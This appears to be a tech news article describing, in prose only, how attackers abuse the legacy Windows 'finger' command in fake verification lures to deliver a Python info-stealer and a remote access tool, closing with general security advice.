- The “finger” command remains exploitable for remote code execution, even after years of disuse
- Attackers use batch scripts to channel server responses directly into Windows command sessions
- Hidden Python programs are delivered through archives disguised as harmless documents
The finger command is an old network lookup tool originally used to retrieve basic information about remote or local system users on Unix and later on Windows.
It was gradually abandoned as modern authentication and user query systems became standard, but this decade-old threat has now apparently quietly re-emerged in malicious operations targeting users who unknowingly execute remote instructions pulled through the outdated protocol.
The method relies on retrieving text-based commands from a remote finger server and running them locally through standard Windows command execution.
Old but still dangerous
Interest in this activity resurfaced when a researcher examined a batch script that triggered a fingerprint request through a remote server before routing the response to a live Windows command session.
The referenced server has since stopped responding, although additional samples showing similar behavior were later linked to ongoing attacks.
One example involved someone who thought they were completing a human verification step – when they actually executed a command linked to a finger address, with the output flowing directly into a command processor session.
Although the server is no longer responsive, the previously captured output showed a sequence that created random paths, cloned a system utility, and extracted a compressed archive disguised as a harmless document.
Inside that archive was a Python program that started through pythonw.exe and later contacted a remote server to confirm execution.
A related batch file suggested that the package contained information theft rather than a harmless testing tool.
Another campaign used a similar request pattern but targeted a different server and delivered almost identical automation.
Analysts observed that this version scanned for common reverse engineering and monitoring tools.
It then left when detected, implying a level of awareness often seen in staged malware activity.
If no detection tools were found, the script downloaded a separate compressed file that provided a known remote access tool used for unauthorized control sessions.
This is followed by scheduling a task that starts it every time the user logs on.
This abuse appears to involve one actor, although random victims continue to report similar incidents.
People are reminded that secure data processing now requires up-to-date anti-virus systems, reliable malware removal practices and a properly configured firewall.
It may sound strange that an older lookup tool still poses a risk, but older protocols can still create real entry points when combined with social engineering.
Via BleepingComputer
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews and opinions in your feeds. Be sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, video unboxings, and get regular updates from us on WhatsApp also.
